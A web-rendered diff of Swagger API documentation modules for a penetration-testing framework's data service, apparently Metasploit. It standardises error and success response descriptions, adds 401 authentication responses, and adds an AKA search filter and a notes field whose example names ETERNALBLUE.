key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -300,7 +344,7 @@ module CredentialApiDoc
|
|||
end
|
||||
|
||||
response 200 do
|
||||
key :description, 'Successful operation.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_200
|
||||
schema do
|
||||
property :data do
|
||||
key :'$ref', :Credential
|
||||
|
@ -308,8 +352,15 @@ module CredentialApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
|
|
@ -36,8 +36,15 @@ module DbExportApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
|
|
@ -48,7 +48,7 @@ module EventApiDoc
|
|||
end
|
||||
|
||||
response 200 do
|
||||
key :description, 'Successful operation.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_200
|
||||
schema do
|
||||
property :data do
|
||||
key :'$ref', :Event
|
||||
|
@ -56,12 +56,19 @@ module EventApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -56,7 +56,7 @@ module ExploitApiDoc
|
|||
end
|
||||
|
||||
response 200 do
|
||||
key :description, 'Successful operation.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_200
|
||||
schema do
|
||||
property :data do
|
||||
key :'$ref', :Exploit
|
||||
|
@ -64,8 +64,15 @@ module ExploitApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
|
|
@ -113,8 +113,15 @@ module HostApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -160,7 +167,7 @@ module HostApiDoc
|
|||
end
|
||||
|
||||
response 200 do
|
||||
key :description, 'Successful operation.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_200
|
||||
schema do
|
||||
property :data do
|
||||
key :'$ref', :Host
|
||||
|
@ -168,8 +175,15 @@ module HostApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -195,8 +209,15 @@ module HostApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -228,8 +249,15 @@ module HostApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -262,12 +290,19 @@ module HostApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -61,8 +61,15 @@ module LoginApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -93,7 +100,7 @@ module LoginApiDoc
|
|||
end
|
||||
|
||||
response 200 do
|
||||
key :description, 'Successful operation.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_200
|
||||
schema do
|
||||
property :data do
|
||||
key :'$ref', :Login
|
||||
|
@ -101,8 +108,15 @@ module LoginApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -127,6 +141,14 @@ module LoginApiDoc
|
|||
end
|
||||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -154,8 +176,15 @@ module LoginApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -180,7 +209,7 @@ module LoginApiDoc
|
|||
end
|
||||
|
||||
response 200 do
|
||||
key :description, 'Successful operation.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_200
|
||||
schema do
|
||||
property :data do
|
||||
key :'$ref', :Login
|
||||
|
@ -188,12 +217,19 @@ module LoginApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -57,8 +57,15 @@ module LootApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -89,7 +96,7 @@ module LootApiDoc
|
|||
end
|
||||
|
||||
response 200 do
|
||||
key :description, 'Successful operation.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_200
|
||||
schema do
|
||||
property :data do
|
||||
key :'$ref', :Loot
|
||||
|
@ -97,8 +104,15 @@ module LootApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -124,8 +138,15 @@ module LootApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -157,8 +178,15 @@ module LootApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
@ -183,7 +211,7 @@ module LootApiDoc
|
|||
end
|
||||
|
||||
response 200 do
|
||||
key :description, 'Successful operation.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_200
|
||||
schema do
|
||||
property :data do
|
||||
key :'$ref', :Loot
|
||||
|
@ -191,12 +219,19 @@ module LootApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -3,6 +3,7 @@ require 'swagger/blocks'
|
|||
module ModuleSearchApiDoc
|
||||
include Swagger::Blocks
|
||||
|
||||
AKA_DESC = 'Filter modules with a matching AKA name.'
|
||||
APP_DESC = 'Filter modules that are client or server attacks. (Accepts strings \'client\' or \'server\').'
|
||||
ARCH_DESC = 'Filter modules with a matching architecture.'
|
||||
AUTHOR_DESC = 'Filter modules written by a matching author.'
|
||||
|
@ -33,7 +34,8 @@ module ModuleSearchApiDoc
|
|||
TARGETS_DESC = 'Alias for \'target\'.'
|
||||
TEXT_DESC = 'Filter modules matching any one of name, full name, description, reference, author, or targets.'
|
||||
TYPE_DESC = 'Filter modules with a matching type (exploit, auxiliary, payload, etc.).'
|
||||
FIELDS_DESC = 'Provide a comma-delimited list of metadata fields you would like to return. If left blank, all fields will be returned. Valid field names are: \'name\', \'full_name\', \'fullname\', \'arch\', \'author\', \'author\', \'description\', \'disclosure_date\', \'cve\', \'edb\', \'bid\', \'mod_time\', \'is_client\', \'is_server\', \'is_install_path\', \'os\', \'platform\', \'reference\', \'references\', \'ref_name\', \'ref\', \'path\', \'port\', \'rport\', \'rank\', \'type\', \'target\', \'targets\''
|
||||
FIELDS_DESC = 'Provide a comma-delimited list of metadata fields you would like to return. If left blank, all fields will be returned. Valid field names are: \'name\', \'full_name\', \'fullname\', \'aka\', \'arch\', \'author\', \'author\', \'description\', \'disclosure_date\', \'cve\', \'edb\', \'bid\', \'mod_time\', \'is_client\', \'is_server\', \'is_install_path\', \'os\', \'platform\', \'reference\', \'references\', \'ref_name\', \'ref\', \'path\', \'port\', \'rport\', \'rank\', \'type\', \'target\', \'targets\''
|
||||
NOTES_DESC = 'Extra info for a module, such as AKA names or NOCVE explanations.'
|
||||
|
||||
TYPE_ENUM = [
|
||||
'auxiliary',
|
||||
|
@ -59,7 +61,6 @@ module ModuleSearchApiDoc
|
|||
'thelightcosine'
|
||||
]
|
||||
REFERENCES_EXAMPLE = [
|
||||
'AKA-ETERNALBLUE',
|
||||
'MSB-MS17-010',
|
||||
'CVE-2017-0143',
|
||||
'CVE-2017-0144',
|
||||
|
@ -81,6 +82,9 @@ module ModuleSearchApiDoc
|
|||
TARGETS_EXAMPLE = [
|
||||
'Windows 7 and Server 2008 R2 (x64) All Service Packs'
|
||||
]
|
||||
NOTES_EXAMPLE = {
|
||||
'AKA' => [ 'ETERNALBLUE' ]
|
||||
}
|
||||
|
||||
|
||||
# Swagger documentation for Module Search model
|
||||
|
@ -103,6 +107,7 @@ module ModuleSearchApiDoc
|
|||
property :path, type: :string, description: PATH_DESC, example: PATH_EXAMPLE
|
||||
property :is_install_path, type: :boolean, description: IS_INSTALL_PATH_DESC, example: IS_INSTALL_PATH_EXAMPLE
|
||||
property :targets, description: TARGET_DESC, example: TARGETS_EXAMPLE, type: :array do items type: :string end
|
||||
property :notes, description: NOTES_DESC, example: NOTES_EXAMPLE, type: :hash do items type: :hash end
|
||||
end
|
||||
|
||||
|
||||
|
@ -114,6 +119,7 @@ module ModuleSearchApiDoc
|
|||
key :tags, [ 'module' ]
|
||||
|
||||
parameters = {
|
||||
:aka => AKA_DESC,
|
||||
:app => APP_DESC,
|
||||
:arch => ARCH_DESC,
|
||||
:author => AUTHOR_DESC,
|
||||
|
@ -167,8 +173,15 @@ module ModuleSearchApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
|
|
@ -18,8 +18,15 @@ module MsfApiDoc
|
|||
end
|
||||
end
|
||||
|
||||
response 401 do
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_401
|
||||
schema do
|
||||
key :'$ref', :AuthErrorModel
|
||||
end
|
||||
end
|
||||
|
||||
response 500 do
|
||||
key :description, 'An error occurred during the operation. See the message for more details.'
|
||||
key :description, RootApiDoc::DEFAULT_RESPONSE_500
|
||||
schema do
|
||||
key :'$ref', :ErrorModel
|
||||
end
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue